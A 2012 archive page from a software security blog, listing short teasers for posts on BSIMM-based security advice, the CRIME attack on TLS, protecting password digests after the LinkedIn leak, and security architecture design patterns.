Software Integrity

Archive for 2012

 

The 10 commandments for software security

You all know by now that the BSIMM is a descriptive model and not a prescriptive one.  We’re happy to give prescriptive advice about software security based on our experience as well.  It’s what we do for a living.  In fact, every prescriptive model (think the Touchpoints) needs to be measured with a measuring stick […]

Continue Reading...

Posted in Maturity Model (BSIMM), Penetration Testing, Software Security Testing | Comments Off on The 10 commandments for software security

 

CRIME: Latest attack against TLS

A couple of days ago, information about a new attack (CRIME) against Transport Layer Security (TLS) was released. This attack was developed by the same researchers (Juliano Rizzo and Thai Duong) that developed the BEAST attack against SSL/TLS. Although details of the attack are not officially known yet, there is speculation (How can you protect […]

Continue Reading...

Posted in Software Security Testing | Comments Off on CRIME: Latest attack against TLS

 

Securing password digests -or- How to protect lonely unemployed radio listeners

As we’re prone to say, “much ink has been spilt over the release of password digests” from LinkedIn and others. I’m, as is typical, profoundly disappointed in that amount of misinformation I’ve heard in security folks’ commentary on the problem and the underlying workings of digests, HMACs, and so forth. This blog entry represents a […]

Continue Reading...

Posted in Threat Modeling | Comments Off on Securing password digests -or- How to protect lonely unemployed radio listeners

 

Caching security architecture knowledge with design patterns

We have always done architecture work. In the past clients replaced their legacy systems with ‘new-fangled’ JavaEE. As they explored platform features, an ecosystem of web frameworks, and related commercial products (Netegrity’s SiteMinder). Realizing they needed help, they looked to us for: Standards/Policy JEE Platform Security Guide JEE Security Specification (Requirements) Technology-specific standards Reference Architecture Security […]

Continue Reading...

Posted in Security Architecture, Software Security Testing | Comments Off on Caching security architecture knowledge with design patterns